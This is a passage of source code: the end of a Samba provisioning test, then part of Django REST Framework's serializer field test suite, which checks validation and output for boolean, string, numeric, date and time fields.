basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
updateOEMInfo(self.ldbs.sam, basedn)
oem2 = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(str(oem), str(oem2))
self.assertTrue(re.match(".*upgrade to.*", str(oem2)))
def tearDown(self):
for name in ["ref.ldb", "secrets.ldb", "secrets.tdb", "secrets.tdb.bak", "secrets.ntdb", "sam.ldb"]:
path = os.path.join(self.tempdir, name)
if os.path.exists(path):
os.unlink(path)
super(UpgradeProvisionWithLdbTestCase, self).tearDown()
| gpl-3.0 |
johnraz/django-rest-framework | tests/test_fields.py | 1 | 54851 | import datetime
import os
import uuid
from decimal import Decimal
import pytest
from django.http import QueryDict
from django.test import TestCase, override_settings
from django.utils import six, timezone
import rest_framework
from rest_framework import serializers
# Tests for field keyword arguments and core functionality.
# ---------------------------------------------------------
class TestEmpty:
"""
Tests for `required`, `allow_null`, `allow_blank`, `default`.
"""
def test_required(self):
"""
By default a field must be included in the input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation()
assert exc_info.value.detail == ['This field is required.']
def test_not_required(self):
"""
If `required=False` then a field may be omitted from the input.
"""
field = serializers.IntegerField(required=False)
with pytest.raises(serializers.SkipField):
field.run_validation()
def test_disallow_null(self):
"""
By default `None` is not a valid input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(None)
assert exc_info.value.detail == ['This field may not be null.']
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.IntegerField(allow_null=True)
output = field.run_validation(None)
assert output is None
def test_disallow_blank(self):
"""
By default '' is not a valid input.
"""
field = serializers.CharField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation('')
assert exc_info.value.detail == ['This field may not be blank.']
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.CharField(allow_blank=True)
output = field.run_validation('')
assert output == ''
def test_default(self):
"""
If `default` is set, then omitted values get the default input.
"""
field = serializers.IntegerField(default=123)
output = field.run_validation()
        assert output == 123
class TestSource:
def test_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='other')
serializer = ExampleSerializer(data={'example_field': 'abc'})
assert serializer.is_valid()
assert serializer.validated_data == {'other': 'abc'}
def test_redundant_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `source='example_field'` on field "
"'CharField' in serializer 'ExampleSerializer', because it is the "
"same as the field name. Remove the `source` keyword argument."
)
def test_callable_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable')
class ExampleInstance(object):
def example_callable(self):
return 'example callable value'
serializer = ExampleSerializer(ExampleInstance())
assert serializer.data['example_field'] == 'example callable value'
def test_callable_source_raises(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable', read_only=True)
class ExampleInstance(object):
def example_callable(self):
raise AttributeError('method call failed')
with pytest.raises(ValueError) as exc_info:
serializer = ExampleSerializer(ExampleInstance())
serializer.data.items()
assert 'method call failed' in str(exc_info.value)
class TestReadOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
read_only = serializers.ReadOnlyField()
writable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_read_only(self):
"""
        Read-only fields should not be included in validation.
"""
data = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'writable': 456}
def test_serialize_read_only(self):
"""
        Read-only fields should be serialized.
"""
instance = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'read_only': 123, 'writable': 456}
class TestWriteOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
write_only = serializers.IntegerField(write_only=True)
readable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_write_only(self):
"""
        Write-only fields should be included in validation.
"""
data = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'write_only': 123, 'readable': 456}
def test_serialize_write_only(self):
"""
        Write-only fields should not be serialized.
"""
instance = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'readable': 456}
class TestInitial:
def setup(self):
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=123)
blank_field = serializers.IntegerField()
self.serializer = TestSerializer()
def test_initial(self):
"""
Initial values should be included when serializing a new representation.
"""
assert self.serializer.data == {
'initial_field': 123,
'blank_field': None
}
class TestInitialWithCallable:
def setup(self):
def initial_value():
return 123
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=initial_value)
self.serializer = TestSerializer()
def test_initial_should_accept_callable(self):
"""
Follows the default ``Field.initial`` behaviour where they accept a
callable to produce the initial value"""
assert self.serializer.data == {
'initial_field': 123,
}
class TestLabel:
def setup(self):
class TestSerializer(serializers.Serializer):
labeled = serializers.IntegerField(label='My label')
self.serializer = TestSerializer()
def test_label(self):
"""
A field's label may be set with the `label` argument.
"""
fields = self.serializer.fields
assert fields['labeled'].label == 'My label'
class TestInvalidErrorKey:
def setup(self):
class ExampleField(serializers.Field):
def to_native(self, data):
self.fail('incorrect')
self.field = ExampleField()
def test_invalid_error_key(self):
"""
If a field raises a validation error, but does not have a corresponding
error message, then raise an appropriate assertion error.
"""
with pytest.raises(AssertionError) as exc_info:
self.field.to_native(123)
expected = (
'ValidationError raised by `ExampleField`, but error key '
'`incorrect` does not exist in the `error_messages` dictionary.'
)
assert str(exc_info.value) == expected
class TestBooleanHTMLInput:
def test_empty_html_checkbox(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField()
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
def test_empty_html_checkbox_not_required(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField, even if the field is required=False.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
class TestHTMLInput:
def test_empty_html_charfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(default='happy')
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 'happy'}
def test_empty_html_charfield_without_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_without_default_not_required(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True, required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_integerfield(self):
class TestSerializer(serializers.Serializer):
message = serializers.IntegerField(default=123)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 123}
def test_empty_html_uuidfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(default=uuid.uuid4)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == ['message']
def test_empty_html_uuidfield_with_optional(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == []
def test_empty_html_charfield_allow_null(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': None}
def test_empty_html_datefield_allow_null(self):
class TestSerializer(serializers.Serializer):
expiry = serializers.DateField(allow_null=True)
serializer = TestSerializer(data=QueryDict('expiry='))
assert serializer.is_valid()
assert serializer.validated_data == {'expiry': None}
def test_empty_html_charfield_allow_null_allow_blank(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True, allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_required_false(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {}
def test_querydict_list_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&scores=3'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1, 3]}
def test_querydict_list_input_only_one_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1]}
class TestCreateOnlyDefault:
def setup(self):
default = serializers.CreateOnlyDefault('2001-01-01')
class TestSerializer(serializers.Serializer):
published = serializers.HiddenField(default=default)
text = serializers.CharField()
self.Serializer = TestSerializer
def test_create_only_default_is_provided(self):
serializer = self.Serializer(data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example', 'published': '2001-01-01'
}
def test_create_only_default_is_not_provided_on_update(self):
instance = {
'text': 'example', 'published': '2001-01-01'
}
serializer = self.Serializer(instance, data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example',
}
def test_create_only_default_callable_sets_context(self):
"""
CreateOnlyDefault instances with a callable default should set_context
on the callable if possible
"""
class TestCallableDefault:
def set_context(self, serializer_field):
self.field = serializer_field
def __call__(self):
return "success" if hasattr(self, 'field') else "failure"
class TestSerializer(serializers.Serializer):
context_set = serializers.CharField(default=serializers.CreateOnlyDefault(TestCallableDefault()))
serializer = TestSerializer(data={})
assert serializer.is_valid()
assert serializer.validated_data['context_set'] == 'success'
# Tests for field input and output values.
# ----------------------------------------
def get_items(mapping_or_list_of_two_tuples):
# Tests accept either lists of two tuples, or dictionaries.
if isinstance(mapping_or_list_of_two_tuples, dict):
# {value: expected}
return mapping_or_list_of_two_tuples.items()
# [(value, expected), ...]
return mapping_or_list_of_two_tuples
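# For example, get_items({'1': 1}) and get_items([('1', 1)]) both yield the
# pair ('1', 1), so test classes can declare expectations in either shape.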
class FieldValues:
"""
Base class for testing valid and invalid input values.
"""
def test_valid_inputs(self):
"""
Ensure that valid values return the expected validated data.
"""
for input_value, expected_output in get_items(self.valid_inputs):
assert self.field.run_validation(input_value) == expected_output
def test_invalid_inputs(self):
"""
Ensure that invalid values raise the expected validation error.
"""
for input_value, expected_failure in get_items(self.invalid_inputs):
with pytest.raises(serializers.ValidationError) as exc_info:
self.field.run_validation(input_value)
assert exc_info.value.detail == expected_failure
def test_outputs(self):
for output_value, expected_output in get_items(self.outputs):
assert self.field.to_representation(output_value) == expected_output
# Boolean types...
class TestBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
None: ['This field may not be null.']
}
outputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
'other': True
}
field = serializers.BooleanField()
def test_disallow_unhashable_collection_types(self):
inputs = (
[],
{},
)
field = serializers.BooleanField()
for input_value in inputs:
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(input_value)
expected = ['"{0}" is not a valid boolean.'.format(input_value)]
assert exc_info.value.detail == expected
class TestNullBooleanField(FieldValues):
"""
    Valid and invalid values for `NullBooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
}
outputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None,
'other': True
}
field = serializers.NullBooleanField()
# String types...
class TestCharField(FieldValues):
"""
Valid and invalid values for `CharField`.
"""
valid_inputs = {
1: '1',
'abc': 'abc'
}
invalid_inputs = {
(): ['Not a valid string.'],
True: ['Not a valid string.'],
'': ['This field may not be blank.']
}
outputs = {
1: '1',
'abc': 'abc'
}
field = serializers.CharField()
def test_trim_whitespace_default(self):
field = serializers.CharField()
assert field.to_internal_value(' abc ') == 'abc'
def test_trim_whitespace_disabled(self):
field = serializers.CharField(trim_whitespace=False)
assert field.to_internal_value(' abc ') == ' abc '
def test_disallow_blank_with_trim_whitespace(self):
field = serializers.CharField(allow_blank=False, trim_whitespace=True)
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(' ')
assert exc_info.value.detail == ['This field may not be blank.']
class TestEmailField(FieldValues):
"""
Valid and invalid values for `EmailField`.
"""
valid_inputs = {
'[email protected]': '[email protected]',
' [email protected] ': '[email protected]',
}
invalid_inputs = {
'examplecom': ['Enter a valid email address.']
}
outputs = {}
field = serializers.EmailField()
class TestRegexField(FieldValues):
"""
Valid and invalid values for `RegexField`.
"""
valid_inputs = {
'a9': 'a9',
}
invalid_inputs = {
'A9': ["This value does not match the required pattern."]
}
outputs = {}
field = serializers.RegexField(regex='[a-z][0-9]')
class TestSlugField(FieldValues):
"""
Valid and invalid values for `SlugField`.
"""
valid_inputs = {
'slug-99': 'slug-99',
}
invalid_inputs = {
'slug 99': ['Enter a valid "slug" consisting of letters, numbers, underscores or hyphens.']
}
outputs = {}
field = serializers.SlugField()
class TestURLField(FieldValues):
"""
Valid and invalid values for `URLField`.
"""
valid_inputs = {
'http://example.com': 'http://example.com',
}
invalid_inputs = {
'example.com': ['Enter a valid URL.']
}
outputs = {}
field = serializers.URLField()
class TestUUIDField(FieldValues):
"""
Valid and invalid values for `UUIDField`.
"""
valid_inputs = {
'825d7aeb-05a9-45b5-a5b7-05df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'825d7aeb05a945b5a5b705df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'urn:uuid:213b7d9b-244f-410d-828c-dabce7a2615d': uuid.UUID('213b7d9b-244f-410d-828c-dabce7a2615d'),
284758210125106368185219588917561929842: uuid.UUID('d63a6fb6-88d5-40c7-a91c-9edf73283072')
}
invalid_inputs = {
'825d7aeb-05a9-45b5-a5b7': ['"825d7aeb-05a9-45b5-a5b7" is not a valid UUID.'],
(1, 2, 3): ['"(1, 2, 3)" is not a valid UUID.']
}
outputs = {
uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'): '825d7aeb-05a9-45b5-a5b7-05df87923cda'
}
field = serializers.UUIDField()
def _test_format(self, uuid_format, formatted_uuid_0):
field = serializers.UUIDField(format=uuid_format)
assert field.to_representation(uuid.UUID(int=0)) == formatted_uuid_0
assert field.to_internal_value(formatted_uuid_0) == uuid.UUID(int=0)
def test_formats(self):
self._test_format('int', 0)
self._test_format('hex_verbose', '00000000-0000-0000-0000-000000000000')
self._test_format('urn', 'urn:uuid:00000000-0000-0000-0000-000000000000')
self._test_format('hex', '0' * 32)
class TestIPAddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 or IPv6 address.'],
'127.122.111.2231': ['Enter a valid IPv4 or IPv6 address.'],
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
1000: ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField()
class TestIPv4AddressField(FieldValues):
"""
    Valid and invalid values for `IPAddressField` with `protocol='IPv4'`.
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 address.'],
'127.122.111.2231': ['Enter a valid IPv4 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv4')
class TestIPv6AddressField(FieldValues):
"""
    Valid and invalid values for `IPAddressField` with `protocol='IPv6'`.
"""
valid_inputs = {
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv6')
class TestFilePathField(FieldValues):
"""
Valid and invalid values for `FilePathField`
"""
valid_inputs = {
__file__: __file__,
}
invalid_inputs = {
'wrong_path': ['"wrong_path" is not a valid path choice.']
}
outputs = {
}
field = serializers.FilePathField(
path=os.path.abspath(os.path.dirname(__file__))
)
# Number types...
class TestIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField`.
"""
valid_inputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0,
'1.0': 1
}
invalid_inputs = {
0.5: ['A valid integer is required.'],
'abc': ['A valid integer is required.'],
'0.5': ['A valid integer is required.']
}
outputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0
}
field = serializers.IntegerField()
class TestMinMaxIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
}
invalid_inputs = {
0: ['Ensure this value is greater than or equal to 1.'],
4: ['Ensure this value is less than or equal to 3.'],
'0': ['Ensure this value is greater than or equal to 1.'],
'4': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.IntegerField(min_value=1, max_value=3)
class TestFloatField(FieldValues):
"""
Valid and invalid values for `FloatField`.
"""
valid_inputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
invalid_inputs = {
'abc': ["A valid number is required."]
}
outputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
field = serializers.FloatField()
class TestMinMaxFloatField(FieldValues):
"""
Valid and invalid values for `FloatField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
1.0: 1.0,
3.0: 3.0,
}
invalid_inputs = {
0.9: ['Ensure this value is greater than or equal to 1.'],
3.1: ['Ensure this value is less than or equal to 3.'],
'0.0': ['Ensure this value is greater than or equal to 1.'],
'3.1': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.FloatField(min_value=1, max_value=3)
class TestDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField`.
"""
valid_inputs = {
'12.3': Decimal('12.3'),
'0.1': Decimal('0.1'),
10: Decimal('10'),
0: Decimal('0'),
12.3: Decimal('12.3'),
0.1: Decimal('0.1'),
'2E+1': Decimal('20'),
}
invalid_inputs = (
('abc', ["A valid number is required."]),
(Decimal('Nan'), ["A valid number is required."]),
(Decimal('Inf'), ["A valid number is required."]),
('12.345', ["Ensure that there are no more than 3 digits in total."]),
(200000000000.0, ["Ensure that there are no more than 3 digits in total."]),
('0.01', ["Ensure that there are no more than 1 decimal places."]),
(123, ["Ensure that there are no more than 2 digits before the decimal point."]),
('2E+2', ["Ensure that there are no more than 2 digits before the decimal point."])
)
outputs = {
'1': '1.0',
'0': '0.0',
'1.09': '1.1',
'0.04': '0.0',
1: '1.0',
0: '0.0',
Decimal('1.0'): '1.0',
Decimal('0.0'): '0.0',
Decimal('1.09'): '1.1',
Decimal('0.04'): '0.0'
}
field = serializers.DecimalField(max_digits=3, decimal_places=1)
class TestMinMaxDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField` with min and max limits.
"""
valid_inputs = {
'10.0': Decimal('10.0'),
'20.0': Decimal('20.0'),
}
invalid_inputs = {
'9.9': ['Ensure this value is greater than or equal to 10.'],
'20.1': ['Ensure this value is less than or equal to 20.'],
}
outputs = {}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
min_value=10, max_value=20
)
class TestNoMaxDigitsDecimalField(FieldValues):
field = serializers.DecimalField(
max_value=100, min_value=0,
decimal_places=2, max_digits=None
)
valid_inputs = {
'10': Decimal('10.00')
}
invalid_inputs = {}
outputs = {}
class TestNoStringCoercionDecimalField(FieldValues):
"""
Output values for `DecimalField` with `coerce_to_string=False`.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
1.09: Decimal('1.1'),
0.04: Decimal('0.0'),
'1.09': Decimal('1.1'),
'0.04': Decimal('0.0'),
Decimal('1.09'): Decimal('1.1'),
Decimal('0.04'): Decimal('0.0'),
}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
coerce_to_string=False
)
class TestLocalizedDecimalField(TestCase):
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_internal_value(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_internal_value('1,1'), Decimal('1.1'))
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_representation(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_representation(Decimal('1.1')), '1,1')
def test_localize_forces_coerce_to_string(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, coerce_to_string=False, localize=True)
self.assertTrue(isinstance(field.to_representation(Decimal('1.1')), six.string_types))
class TestQuantizedValueForDecimal(TestCase):
def test_int_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value(12).as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_part_precision_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12.0').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
class TestNoDecimalPlaces(FieldValues):
valid_inputs = {
'0.12345': Decimal('0.12345'),
}
invalid_inputs = {
'0.1234567': ['Ensure that there are no more than 6 digits in total.']
}
outputs = {
'1.2345': '1.2345',
'0': '0',
'1.1': '1.1',
}
field = serializers.DecimalField(max_digits=6, decimal_places=None)
# Date & time serializers...
class TestDateField(FieldValues):
"""
Valid and invalid values for `DateField`.
"""
valid_inputs = {
'2001-01-01': datetime.date(2001, 1, 1),
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1),
}
invalid_inputs = {
'abc': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
'2001-99-99': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
datetime.datetime(2001, 1, 1, 12, 00): ['Expected a date but got a datetime.'],
}
outputs = {
datetime.date(2001, 1, 1): '2001-01-01',
'2001-01-01': '2001-01-01',
six.text_type('2016-01-10'): '2016-01-10',
None: None,
'': None,
}
field = serializers.DateField()
class TestCustomInputFormatDateField(FieldValues):
"""
Valid and invalid values for `DateField` with a custom input format.
"""
valid_inputs = {
'1 Jan 2001': datetime.date(2001, 1, 1),
}
invalid_inputs = {
'2001-01-01': ['Date has wrong format. Use one of these formats instead: DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateField(input_formats=['%d %b %Y'])
class TestCustomOutputFormatDateField(FieldValues):
"""
Values for `DateField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): '01 Jan 2001'
}
field = serializers.DateField(format='%d %b %Y')
class TestNoOutputFormatDateField(FieldValues):
"""
Values for `DateField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1)
}
field = serializers.DateField(format=None)
class TestDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField`.
"""
valid_inputs = {
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'abc': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
'2001-99-99T99:00': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
datetime.date(2001, 1, 1): ['Expected a datetime but got a date.'],
}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '2001-01-01T13:00:00',
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): '2001-01-01T13:00:00Z',
'2001-01-01T00:00:00': '2001-01-01T00:00:00',
six.text_type('2016-01-10T00:00:00'): '2016-01-10T00:00:00',
None: None,
'': None,
}
field = serializers.DateTimeField(default_timezone=timezone.UTC())
class TestCustomInputFormatDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with a custom input format.
"""
valid_inputs = {
'1:35pm, 1 Jan 2001': datetime.datetime(2001, 1, 1, 13, 35, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'2001-01-01T20:50': ['Datetime has wrong format. Use one of these formats instead: hh:mm[AM|PM], DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateTimeField(default_timezone=timezone.UTC(), input_formats=['%I:%M%p, %d %b %Y'])
class TestCustomOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '01:00PM, 01 Jan 2001',
}
field = serializers.DateTimeField(format='%I:%M%p, %d %b %Y')
class TestNoOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00),
}
field = serializers.DateTimeField(format=None)
class TestNaiveDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with naive datetimes.
"""
valid_inputs = {
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00),
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00),
}
invalid_inputs = {}
outputs = {}
field = serializers.DateTimeField(default_timezone=None)
class TestTimeField(FieldValues):
"""
Valid and invalid values for `TimeField`.
"""
valid_inputs = {
'13:00': datetime.time(13, 00),
datetime.time(13, 00): datetime.time(13, 00),
}
invalid_inputs = {
'abc': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
'99:99': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
}
outputs = {
datetime.time(13, 0): '13:00:00',
datetime.time(0, 0): '00:00:00',
'00:00:00': '00:00:00',
None: None,
'': None,
}
field = serializers.TimeField()
class TestCustomInputFormatTimeField(FieldValues):
"""
Valid and invalid values for `TimeField` with a custom input format.
"""
valid_inputs = {
'1:00pm': datetime.time(13, 00),
}
invalid_inputs = {
'13:00': ['Time has wrong format. Use one of these formats instead: hh:mm[AM|PM].'],
}
outputs = {}
field = serializers.TimeField(input_formats=['%I:%M%p'])
class TestCustomOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): '01:00PM'
}
field = serializers.TimeField(format='%I:%M%p')
class TestNoOutputFormatTimeField(FieldValues):
"""
    Values for `TimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): datetime.time(13, 00)
}
field = serializers.TimeField(format=None)
class TestDurationField(FieldValues):
"""
Valid and invalid values for `DurationField`.
"""
valid_inputs = {
'13': datetime.timedelta(seconds=13),
'3 08:32:01.000123': datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
'08:01': datetime.timedelta(minutes=8, seconds=1),
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
3600: datetime.timedelta(hours=1),
}
invalid_inputs = {
'abc': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
'3 08:32 01.123': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
}
outputs = {
